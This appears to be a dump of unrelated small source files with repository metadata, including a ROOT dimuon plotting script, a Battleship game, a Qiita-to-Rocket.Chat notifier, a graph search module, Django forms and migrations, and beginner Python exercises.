cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_fake_log.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_fake_log.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_fake_log.C")
cnv.SetLogy(0)
cnv.SetLogx(0)
h_dimuon_1_pT_dummy.Draw()
h_dimuon_1_pT.DrawNormalized("same")
h_dimuon_2_pT.DrawNormalized("same")
scaleAxisY(h_dimuon_2_pT,h_dimuon_1_pT_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_dimuon_1_pT,"1st #mu#mu (leading p_{T})","L")
legend.AddEntry(h_dimuon_2_pT,"2nd #mu#mu","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_pT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_pT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_pT.C")
h_dimuon_1_pZ_dummy.Draw()
#plotOverflow(h_dimuon_1_pZ)
#plotOverflow(h_dimuon_2_pZ)
h_dimuon_1_pZ.DrawNormalized("same")
h_dimuon_2_pZ.DrawNormalized("same")
scaleAxisY(h_dimuon_2_pZ,h_dimuon_1_pZ_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_dimuon_1_pZ,"1st #mu#mu (leading p_{T})","L")
legend.AddEntry(h_dimuon_2_pZ,"2nd #mu#mu","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_pZ.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_pZ.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_pZ.C")
h_dimuon_1_Eta_dummy.Draw()
h_dimuon_1_Eta.DrawNormalized("same")
h_dimuon_2_Eta.DrawNormalized("same")
scaleAxisY(h_dimuon_1_Eta,h_dimuon_1_Eta_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_dimuon_1_Eta,"1st #mu#mu (leading p_{T})","L")
legend.AddEntry(h_dimuon_2_Eta,"2nd #mu#mu","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_Eta.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_Eta.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_Eta.C")
h_dimuon_1_Phi_dummy.Draw()
h_dimuon_1_Phi.DrawNormalized("same")
h_dimuon_2_Phi.DrawNormalized("same")
scaleAxisY(h_dimuon_1_Phi,h_dimuon_1_Phi_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_dimuon_1_Phi,"1st #mu#mu (leading p_{T})","L")
legend.AddEntry(h_dimuon_2_Phi,"2nd #mu#mu","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_Phi.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_Phi.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_Phi.C")
h_dimuon_1_p_dummy.Draw()
plotOverflow(h_dimuon_1_p)
plotOverflow(h_dimuon_2_p)
scaleAxisY(h_dimuon_2_p,h_dimuon_1_p_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_dimuon_1_p,"1st #mu#mu (leading p_{T})","L")
legend.AddEntry(h_dimuon_2_p,"2nd #mu#mu","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_p.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_p.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_p.C")
BAM.Write()
print "Made it to the end and closes"
f.close()
| [
"[email protected]"
]
| |
2690dfe618649e308a0dc47ef332ab5e56e29930 | 84c38b838ca74cf80fe276d272537b1b840bfe6d | /Battleship.py | 6ff503cc58f958d7415b052af718a3ad315768e3 | []
| no_license | Chruffman/Personal-Projects | 9c385a145e02661cf0dddc76d6f2b5034a6a35f9 | d271573b4e48c3026d0cc09d4483c218bc3dfa97 | refs/heads/master | 2021-01-21T05:17:07.536173 | 2018-07-24T13:37:50 | 2018-07-24T13:37:50 | 83,166,561 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,247 | py | # my attempt at the Battleship! assignment from codeacademy.com
from random import randint
# 6x6 ocean grid; every cell starts as open water ("O").
board = [["O"] * 6 for _ in range(6)]
def display_board(board):
    """Print the grid, one row per line, with cells separated by spaces."""
    for cells in board:
        line = " ".join(cells)
        print(line)
# Greet the player and show the untouched board before the first guess.
print ("Let's play Battleship!")
display_board(board)
def new_row(board):
    """Return a random valid row index for the given board."""
    last_index = len(board) - 1
    return randint(0, last_index)
def new_col(board):
    """Return a random valid column index for the given board.

    NOTE: like the original, this assumes a square board — the column
    range is derived from the number of rows.
    """
    last_index = len(board) - 1
    return randint(0, last_index)
# --- Game loop --------------------------------------------------------------
# Hide the ship in a random cell.  The original printed game_row/game_col
# here (debug output), which revealed the answer to the player — removed.
game_row = new_row(board)
game_col = new_col(board)

MAX_GUESSES = 5

# One turn per guess.  The original kept a redundant `guess = 0` plus a
# `guess += 1` inside the for-loop; counting directly from 1 is clearer.
for turn in range(1, MAX_GUESSES + 1):
    print("Guess", turn)
    user_row = int(input("Guess row: "))
    user_col = int(input("Guess column: "))

    if user_row == game_row and user_col == game_col:
        print("You sunk my battleship! Curses!!")
        print("You win!")
        break

    # Miss: explain why, and record valid shots on the board.  The original
    # skipped marking the board on the final miss — fixed so the closing
    # display_board() shows every shot taken.
    if user_row not in range(6) or user_col not in range(6):
        print("Your guess is not even in the ocean. Maybe improve your aim?")
    elif board[user_row][user_col] == 'X':
        print("You have already unsuccessfully guessed that sector of the game board.")
    else:
        board[user_row][user_col] = 'X'
        print("You missed my battleship!")

    if turn == MAX_GUESSES:
        print("Game Over.")

# Show the final state of the ocean, win or lose.
display_board(board)
"[email protected]"
]
| |
4ec6a82a97d5f6196307fc39b56522e1fa8b4f01 | a1e01939dfb63139271b137620f57a55420f8dbe | /utils/path_helper.py | 85715b225a360b44fe77bf61e8fa0ca6a7f65723 | [
"BSD-3-Clause"
]
| permissive | KindRoach/NARRE-Pytorch | 839becc7128a5875e6dbcab62eafea914b3b7c4f | 14fec7e623e36350e43d24e2629297ab0d308170 | refs/heads/master | 2023-06-01T02:56:03.323533 | 2023-05-22T13:32:23 | 2023-05-22T13:32:23 | 270,171,507 | 8 | 3 | null | null | null | null | UTF-8 | Python | false | false | 114 | py | from pathlib import Path
ROOT_DIR = Path(__file__).parent.parent
if __name__ == "__main__":
print(ROOT_DIR)
| [
"[email protected]"
]
| |
6b6eff5bda3cf3377e02463065468ac0476d1bf8 | 38ecc2e4d128f2770c105673fba2c480a96d688f | /Задание №1 по наследованию.py | a44643ebcea89a7b2241ab2fc0a27647c14c4a1a | []
| no_license | Valentin31121967/Class- | 288c4b2cf430bcb1b6c3dd756d0040867125b2f9 | 078ab77356e9d6b7532622a2d32c5ea29fb7ffcb | refs/heads/master | 2022-04-15T05:09:11.094751 | 2020-04-15T04:45:29 | 2020-04-15T04:45:29 | 255,808,474 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,352 | py | # Задание №1. Взять задание из предыдущей лекции и отделить функции сохранения и загрузки в отдельный класс
import json
# Container class for a person's details, filled in from stdin.
class User:
    """Holds a person's name parts and age, entered via input_info()."""

    # BUG FIX: the original defined `_init_` (single underscores), which
    # Python never calls as a constructor, so instances started with no
    # attributes at all.  Renamed to the real `__init__` dunder.
    def __init__(self):
        # All fields start empty until input_info() (or a loader) fills them.
        self.first_name = None
        self.middle_name = None
        self.last_name = None
        self.age = None

    def input_info(self):
        """Prompt on stdin for each personal field and store the answers."""
        self.first_name = input("Input First Name: ")
        self.middle_name = input("Input Middle Name: ")
        self.last_name = input("Input Last Name: ")
        self.age = input("Input Age: ")

    def serialize(self):
        """Return the stored fields as a human-readable multi-line string."""
        return "First name: {}\n" \
               "Middle name: {}\n"\
               "Last name: {}\n" \
               "Age : {}\n"\
               .format(self.first_name, self.middle_name, self.last_name, self.age)
# Subclass of User that adds JSON persistence (save to / load from disk).
class Save_load_data(User):
    """User variant that can dump its fields to a JSON file and restore them."""

    def fail_save(self):
        """Ask for a file name on stdin and write the fields to it as JSON."""
        target = str(input("Введите с клавиатуры имя файла для записи на диск: "))
        with open(target, "w") as f:
            payload = {"first_name": self.first_name,
                       "middle_name": self.middle_name,
                       "last_name": self.last_name,
                       "age": self.age}
            json.dump(payload, f)

    def fail_load(self):
        """Ask for a file name on stdin, read JSON from it and restore fields."""
        source = str(input("Введите с клавиатуры имя файла для загрузки с диска: "))
        with open(source, "r") as f:
            payload = json.loads(f.read())
            self.first_name = payload["first_name"]
            self.last_name = payload["last_name"]
            self.middle_name = payload["middle_name"]
            self.age = payload["age"]
            print(payload)
# Demo driver: collect a user's details, display them, then round-trip
# the data through a file on disk.
user = Save_load_data()
user.input_info()
print(user.serialize())
# NOTE(review): fail_save()/fail_load() return None, so these two prints
# emit "None" after the side effects run — presumably a progress trace.
print(user.fail_save())
print(user.fail_load())
print(user)
| [
"[email protected]"
]
| |
b04ee7d509224ea32bcdc2abd3aa726509802b36 | 253296050582fbe0a8605353295ab27daae4deff | /main.py | 32884c43658bae739d1868be5e5ce5b322bef693 | []
| no_license | qiita-scraper/qiita-scraper-rocket-chat | a44d95d125431670dda97b5614f92d0ee0d09098 | 86c1b6e0d4d889deb9a468cd85a1d0f93eb9cc20 | refs/heads/master | 2023-05-14T23:39:42.637110 | 2019-12-17T15:50:51 | 2019-12-17T15:50:51 | 228,154,303 | 4 | 0 | null | 2023-05-07T13:10:45 | 2019-12-15T08:43:31 | Python | UTF-8 | Python | false | false | 1,461 | py | import os
from rocket_chat import rocket_chat
from qiita import qiita
import yaml
def main():
    """Post yesterday's Qiita articles by organization members to Rocket.Chat."""
    url, user, password = __get_os_environ()
    room_name, organization = __get_config()

    scraper = qiita.Qiita()
    chat = rocket_chat.RocketChat(url, user, password)

    # For each member, find articles published yesterday and announce them.
    for member in scraper.fetch_organization_users(organization):
        recent = scraper.fetch_recent_user_articles(member)
        for article in scraper.extract_yesterday_articles(recent):
            message = chat.format_message(
                user=member,
                title=article['title'],
                article_url=article['url'],
            )
            chat.send_message_to_rocket_chat(message, room_name)
def __get_config():
    """Read the Rocket.Chat room name and Qiita organization from config.yml.

    Returns:
        tuple: (room_name, organization) as found in the YAML config.
    """
    # Context manager closes the handle (the original leaked it), and
    # safe_load avoids executing arbitrary YAML tags from the config file
    # (bare yaml.load without a Loader is deprecated and unsafe).
    with open("config.yml", "r") as f:
        data = yaml.safe_load(f)
    room_name = data.get('rocket_chat').get('room_name')
    organization = data.get('qiita').get('organization')
    return room_name, organization
def __get_os_environ():
    """Fetch Rocket.Chat connection settings from environment variables.

    Returns:
        tuple: (url, user, password).

    Raises:
        Exception: if any of the three variables is unset or empty.
    """
    values = []
    for name in ('ROCKET_CHAT_URL', 'ROCKET_CHAT_USER', 'ROCKET_CHAT_PASSWORD'):
        value = os.environ.get(name)
        # Unset and empty-string are both rejected, exactly as before.
        if value is None or len(value) == 0:
            raise Exception('{} is not set in environment variable'.format(name))
        values.append(value)
    return tuple(values)
def handler(event, context):
    # AWS Lambda entry point; event and context are accepted but unused.
    main()
| [
"[email protected]"
]
| |
79db44dd6ae283d024b6f0487e48e369d2b2d272 | 83eadd220a58329ad7fdb6a223dcc02cb9e6dd81 | /load_discussions.py | 67d431ff934d2ae0fe8c1580dd8f0a00309eba1c | []
| no_license | LironRS/anyway | 7d49a1d994d3685d62acf6e3435a38c9f58b0c35 | 813283a0c4fe966f1752d0e2e85aa30c6fad7693 | refs/heads/master | 2021-01-15T09:09:12.309208 | 2015-05-19T12:21:22 | 2015-05-19T12:21:22 | 35,944,465 | 0 | 0 | null | 2015-05-20T11:42:39 | 2015-05-20T11:42:39 | null | UTF-8 | Python | false | false | 977 | py | # -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
from models import DiscussionMarker
import re
from datetime import datetime
from database import db_session
def main():
    """Create a DiscussionMarker for every "(lat, lon)" Disqus identifier
    given on the command line, committing each one as it is added.

    Identifiers that do not match the coordinate pattern are reported and
    skipped.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('identifiers', type=str, nargs='+',
                        help='Disqus identifiers to create markers for')
    args = parser.parse_args()

    for identifier in args.identifiers:
        # Raw string: '\(' and '\d' in a plain string literal are invalid
        # escape sequences (DeprecationWarning now, SyntaxError eventually).
        m = re.match(r'\((\d+\.\d+),\s*(\d+\.\d+)\)', identifier)
        if not m:
            print("Failed processing: " + identifier)
            continue
        (latitude, longitude) = m.group(1, 2)
        marker = DiscussionMarker.parse({
            'latitude': latitude,
            'longitude': longitude,
            'title': identifier,
            'identifier': identifier
        })
        db_session.add(marker)
        db_session.commit()
        print("Added: " + identifier)
if __name__ == "__main__":
    # Script entry point.
    main()
| [
"[email protected]"
]
| |
a2f7ae216b410776277bf51f39352e0afd7a8354 | cb892c75961eeae4e9c968403e823565d2b0056e | /periodic1D.py | ce67dcd6b4588f63f65e9a66e3aeef14fbdecd90 | []
| no_license | victorstorchan/signal-processing | 7deb60ed1e3f7ae09553cbe0faf6fce3fec97fc8 | a51e9855cb8cb7a63ecbab9fac645fc4846b03a7 | refs/heads/master | 2021-01-19T03:02:07.791676 | 2016-07-16T12:32:27 | 2016-07-16T12:32:27 | 52,238,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,917 | py | import numpy as np
import matplotlib.pyplot as plt
from cmath import polar
from math import sqrt
#definition of the boxcars signals
def boxcar(x, i):
    """Unit boxcar centred at *i*: returns 1 when x is in [i-1, i+1],
    otherwise 0 (bounds inclusive)."""
    return 1 if -1 <= x - i <= 1 else 0
# Sample grid and reference (unshifted) boxcar signal.
x= np.arange(-2.,2.,0.05)
n=len(x)
print(n)
True_signal=np.zeros(n)
for i in range(n):
    True_signal[i]=boxcar(x[i],0)
#plt.plot(x,True_signal)
#plt.axis([-2,2,-1,2])
#plt.show()
#definitions of the shifted signals
y=np.zeros(n,dtype=complex)
y2=np.zeros(n,dtype=complex)
base=np.zeros(n,dtype=complex)
vector_of_shift=[0,3,10,30]#shifts are integer in discrete version
len_shift=len(vector_of_shift)
#signal with shift:
shifted_signals=np.zeros((len_shift,n),dtype=complex)
shifted_signals_1=np.zeros((len_shift,n),dtype=complex)
for k in range(n):
    base[k]=boxcar(x[k],0)
# Pad the base signal on the left with 'wrap' so shifted copies can read
# the wrapped-around samples instead of indexing out of bounds.
max_shift=max(vector_of_shift)
base_period=np.lib.pad(base, (max_shift, 0), 'wrap')
for s in range(len_shift):
    for k in range(n):
        if k-vector_of_shift[s]<0:
            # Wrapped part of the shifted signal.
            # NOTE(review): the "-1" in this index looks like a possible
            # off-by-one relative to the unwrapped branch -- confirm.
            y[k]=base_period[max_shift-vector_of_shift[s]-1+k]
            y2[k]=base_period[max_shift-vector_of_shift[s]-1+k]*np.exp(2J*np.pi*k/n)
        else:
            y[k]=boxcar(x[k-vector_of_shift[s]],0)
            y2[k]=boxcar(x[k-vector_of_shift[s]],0)*np.exp(2J*np.pi*k/n)
    # Noise vector is computed but currently disabled (see trailing '#+').
    randvect=np.random.normal(0,0.1,n)
    shifted_signals[s] =y#+ randvect
    shifted_signals_1[s]=y2#+ randvect
# Cross-spectra of the plain and modulated copies; their relative phase is
# what carries the per-signal shift information.
A=np.fft.fft(shifted_signals)
A_1=np.fft.fft(shifted_signals_1).conjugate()
A_star=np.zeros((len_shift,n),dtype=complex)
for i in range(len_shift):
    A_star[i] = A[i]*A_1[i]
A_star_matrix=np.matrix(A_star)
A_star_transpose=A_star_matrix.getH()
A_prod1=A_star_matrix*A_star_transpose
# Normalise by the (0,0) entry so the reference (zero-shift) row has unit phase.
A_prod=A_prod1/A_prod1[0,0]
(V,sigma,V_star)=np.linalg.svd(A_prod,full_matrices=1)
# Leading right-singular vector: its per-entry phase encodes the shifts.
v1=V_star[0].getH()
#the shifts are recovered:
output=np.zeros(len_shift,dtype=complex)
for i in range(len_shift):
    output[i]=-n*polar(-v1[i,0])[1]/(2*np.pi)
output
| [
"[email protected]"
]
| |
f1fb0b7965ea4496faa19f2a337c9563b82ab413 | d12fe2658edc0db98b278aab507fc86efefd5541 | /chat/forms.py | 0d23f6da0892f36ce4d4af4442b0a0e72db168f1 | []
| no_license | harumi-matsumoto/django-ai-chatbot | 6190c1090e8aea877ff7573c45421e10158e4a64 | 90e2b8e8cec98c022892e8603eb090fc64197b3f | refs/heads/master | 2020-08-05T16:10:09.162039 | 2019-10-12T03:10:54 | 2019-10-12T03:10:54 | 212,608,451 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | from django import forms
class TestPredictForm(forms.Form):
    """Django form with a single free-text *message* field (max 255 chars),
    rendered as a textarea."""
    message = forms.CharField(widget=forms.Textarea, max_length=255)
"[email protected]"
]
| |
b64dcfd8310e0a91a5674a0426a212d4e4014f18 | b12875980121be80628e3204a5a62fbbd6190222 | /seesion7/minihack5.py | 7dba52421d756d3b660a75259e7d867a584fab55 | []
| no_license | hoangstillalive/hoangstillalive | ef2eb9a173b346e75ac0a35c455cebacd1a9fe91 | 304e0087792857815090cb890e18086d1128df6f | refs/heads/master | 2020-06-12T10:07:33.319139 | 2019-09-13T12:31:57 | 2019-09-13T12:31:57 | 194,267,120 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 192 | py | side = int(input("Enter side of shape you like:"))
angle = 360/side
from turtle import*
shape("turtle")
for i in range(side):
forward(100)
left (angle)
mainloop()
| [
"[email protected]"
]
| |
c0b608d437f149d8760c931ec9488e38f0fefb57 | b7634e92ed147a34cdb017598c6d8dd41c0def96 | /aula05/migrations/0002_categoria_comentario_post.py | 3a636face480cf6e0fdc9a2f6b875eb3ce1d9fd2 | []
| no_license | mayronceccon/olist-django-labs | a4e9805489f4c9ad782f5085188dee342d4ac051 | fbe6f314554e65f0a47dddc7c2c21165ccc1d828 | refs/heads/master | 2021-09-28T14:21:44.385979 | 2020-06-06T00:25:54 | 2020-06-06T00:25:54 | 240,728,135 | 1 | 0 | null | 2021-09-22T18:44:59 | 2020-02-15T14:36:27 | Python | UTF-8 | Python | false | false | 1,411 | py | # Generated by Django 3.0.3 on 2020-02-29 17:15
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated Django migration: creates the Categoria, Post and
    # Comentario models (Post <-> Categoria many-to-many,
    # Comentario -> Post foreign key with CASCADE delete).

    dependencies = [
        ('aula05', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='Categoria',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('nome', models.CharField(max_length=30)),
            ],
        ),
        migrations.CreateModel(
            name='Post',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('titulo', models.CharField(max_length=254)),
                ('texto', models.TextField()),
                ('categorias', models.ManyToManyField(related_name='posts', to='aula05.Categoria')),
            ],
        ),
        migrations.CreateModel(
            name='Comentario',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('autor', models.CharField(max_length=30)),
                ('comentario', models.TextField()),
                ('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='aula05.Post')),
            ],
        ),
    ]
| [
"[email protected]"
]
| |
65e50e3080ce522797d0807c4a9ccf3ad3d59230 | 9cb4b1707c9cf2cb2d45849a32625ddcd5d2ce15 | /data_structures/graph/graph.py | 76c5509f826c0cf30c80e238bb6245540194a1f8 | []
| no_license | paxzeno/CrackingTheCodingInterview | 14b0a0bd8a8f9a0bf30defbd07c4e6d1c1b0a549 | d082c704d8a2d4a4e61371091abb023a1dc5fa99 | refs/heads/master | 2020-04-26T17:24:55.098714 | 2019-03-16T17:35:03 | 2019-03-16T17:35:03 | 173,712,427 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,397 | py | import random
import Queue
from node import Node
class RoadMap:
    """State for one breadth-first expansion: the pending queue, the
    parent-link map discovered so far, and the children produced by the
    most recent expansion step."""

    def __init__(self, queue):
        self._work_queue = queue
        self._parents = {}
        self._frontier = set()

    def get_queue(self):
        return self._work_queue

    def set_path(self, node_name, parent_node_name):
        # Last writer wins when several parents reach the same child --
        # a potential source of bogus paths worth keeping in mind.
        self._parents[node_name] = parent_node_name

    def get_path(self):
        return self._parents

    def set_new_paths(self, paths):
        self._frontier = paths

    def get_new_paths(self):
        return self._frontier
class Graph:
    """Directed graph of Node objects with random generation and
    breadth-first search helpers.

    NOTE: written for Python 2 (uses ``xrange`` and the ``Queue`` module).
    """
    def __init__(self):
        self._nodes = []
    def add_node(self, node):
        """Append an already-constructed Node to the graph."""
        self._nodes.append(node)
    def get_nodes(self):
        """Return the internal node list (not a copy)."""
        return self._nodes
    def generate_graph(self, number_nodes, max_number_children=4):
        """Build a random graph of *number_nodes* nodes; each node gets
        1..max_number_children outgoing edges to other random nodes
        (self-loops avoided; duplicate edges remain possible)."""
        self._nodes = [None] * number_nodes
        for i in xrange(0, number_nodes):
            self._nodes[i] = Node(i)
        for node in self._nodes:
            # number of children this node will have from 1 to 4 Max
            number_children = random.randint(1, max_number_children)
            for j in xrange(0, number_children):
                child_node_name = -1
                # Re-draw until the child is a node other than ourselves.
                while child_node_name == -1 or child_node_name == node.get_name():
                    child_node_name = random.randint(0, number_nodes - 1)
                node.add_child(self._nodes[child_node_name])
    def depth_first_search(self, node_name):
        # to be implemented
        return None
    def breath_first_search(self, root_name, end_name):
        """Plain BFS from root_name; returns a printable route string to
        end_name (see print_path) or the not-found message."""
        node = self._nodes[root_name]
        queue = Queue.Queue()
        queue.put(node)
        # TODO no need to have checked and path,
        # TODO path can handle both functions
        checked = set()
        # NOTE(review): the root is added as a Node *object*, but all later
        # membership tests use node *names* -- so the root is never matched
        # by name. Confirm this is intentional.
        checked.add(node)
        path = {}
        while not queue.empty():
            q_node = queue.get()
            self.print_node(q_node)
            for child_node in q_node.get_children():
                if child_node.get_name() not in checked:
                    path[child_node.get_name()] = q_node.get_name()
                    checked.add(child_node.get_name())
                    if child_node.get_name() == end_name:
                        return self.print_path(path, root_name, end_name)
                    else:
                        queue.put(child_node)
        return self.print_path(None)
    def bidirectional_bfs_search(self, root_name, end_name):
        """BFS driven through RoadMap state.

        NOTE(review): despite the name, only the forward direction is
        expanded -- no frontier grows from end_name."""
        root_node = self._nodes[root_name]
        end_node = self._nodes[end_name]
        root_queue = Queue.Queue()
        root_queue.put(root_node)
        root_road_map = RoadMap(root_queue)
        found = False
        while not root_road_map.get_queue().empty() and not found:
            root_road_map = self.iterated_bfs_search(root_road_map)
            if end_node in root_road_map.get_new_paths():
                found = True
        if found:
            return self.print_path(root_road_map.get_path(), root_name, end_name)
        return self.print_path(None)
    def iterated_bfs_search(self, road_map):
        """Expand one node from the road map's queue: record parent links
        for unseen children and enqueue them. Returns the (mutated) map."""
        queue = road_map.get_queue()
        node = queue.get()
        self.print_node(node)
        children = node.get_children()
        road_map.set_new_paths(children)
        path = road_map.get_path()
        for child_node in children:
            if child_node.get_name() not in path:
                road_map.set_path(child_node.get_name(), node.get_name())
                queue.put(child_node)
        return road_map
    @staticmethod
    def print_path(path, origin=None, end=None):
        """Render the parent-link map as 'end -> parent -> ... -> origin',
        or return a not-found message when path is None."""
        if path is None:
            return 'No path found for the node'
        route = str(end)
        pointer = end
        while pointer != origin:
            route += ' -> ' + str(path[pointer])
            pointer = path[pointer]
        return route
    @staticmethod
    def print_node(node):
        """Print one node's name followed by the names of its children."""
        print_children = ', Child Nodes: ['
        for child_node in node.get_children():
            print_children += str(child_node.get_name()) + ';'
        print_children += ']'
        print('Node:' + str(node.get_name()) + print_children)
if __name__ == '__main__':
    # Demo: random 20-node graph (max 2 children each), then search for a
    # route from node 0 to node 2 with both BFS variants.
    graph = Graph()
    graph.generate_graph(20, 2)
    print(graph.breath_first_search(0, 2))
    print(graph.bidirectional_bfs_search(0, 2))
| [
"[email protected]"
]
| |
712c8911fb30a81f68341c8d02607fc01373169c | bc2effb57e82128b81371fb03547689255d5ef15 | /백준/그래프/13549(숨바꼭질 3).py | 3e27f94ac43b4efa403bf096775a59d3e8e538cd | []
| no_license | CharmingCheol/python-algorithm | 393fa3a8921f76d25e0d3f02402eae529cc283ad | 61c8cddb72ab3b1fba84171e03f3a36f8c672648 | refs/heads/master | 2023-03-01T11:00:52.801945 | 2021-01-31T13:38:29 | 2021-01-31T13:38:29 | 229,561,513 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 738 | py | import sys
from collections import deque
MAX_SIZE = 100001
start, end = map(int, sys.stdin.readline().split())
board = [float("inf")] * MAX_SIZE
board[start] = 0
queue = deque()
queue.append((start, 0))
while queue:
now, value = queue.popleft()
if now == end:
print(board[now])
break
if value != board[now]: continue
if 0 <= now - 1 and value + 1 < board[now - 1]:
board[now - 1] = value + 1
queue.append((now - 1, value + 1))
if now + 1 < MAX_SIZE and value + 1 < board[now + 1]:
board[now + 1] = value + 1
queue.append((now + 1, value + 1))
if now * 2 < MAX_SIZE and value < board[now * 2]:
board[now * 2] = value
queue.append((now * 2, value))
| [
"[email protected]"
]
| |
37886a99293824da426248ef167d6469762d4331 | 48d17885eda6401cde7e4ef563727ad4b5a7e851 | /ex43_classes.py | 18549bd62a8d355389e39399f65761f4a307dcb6 | []
| no_license | bowen0701/learn-python-the-hard-way | 635680d711dca044e2584ffe7dc3b129998f59db | 73540c462cf1561271664d2058e902d60907c200 | refs/heads/master | 2021-09-22T11:01:35.059384 | 2018-09-08T23:30:38 | 2018-09-08T23:30:38 | 94,005,892 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 760 | py | """Basic Object-Oriented Anaysis and Design."""
class Scene(object):
    """Base class for all game scenes; subclasses implement enter()."""
    def enter(self):
        # Stub: overridden by concrete scenes.
        pass
class Engine(object):
    """Runs the game by stepping through the scenes of a Map."""
    def __init__(self, scene_map):
        # scene_map: the Map whose scenes will be played (stub).
        pass
    def play(self):
        # Stub: main loop that advances from scene to scene.
        pass
class Death(Scene):
    """Game-over scene (stub)."""
    def enter(self):
        pass
class CentralCorridor(Scene):
    """Opening scene of the game (stub)."""
    def enter(self):
        pass
class LaserWeaponArmory(Scene):
    """Armory scene (stub)."""
    def enter(self):
        pass
class TheBridge(Scene):
    """Bridge scene (stub)."""
    def enter(self):
        pass
class EscapePod(Scene):
    """Escape-pod scene (stub)."""
    def enter(self):
        pass
class Map(object):
    """Holds the scenes and knows which one comes next."""
    def __init__(self, start_scene):
        # start_scene: name of the opening scene (stub).
        pass
    def next_scene(self, scene_name):
        # Stub: return the scene following *scene_name*.
        pass
    def opening_scene(self):
        # Stub: return the scene the game starts in.
        pass
# Wire up the map and the engine, then start the game.
a_map = Map('central_corridor')
a_game = Engine(a_map)
a_game.play()
| [
"[email protected]"
]
| |
7e33879f634aa7e8d75988cebf28a1a0a95922cf | 9918208c80a3c396d8a1e13783d501d60dbc2050 | /digitalearthau/index.py | 184f71b63443c944423a74ab43f21a32af6c40c5 | []
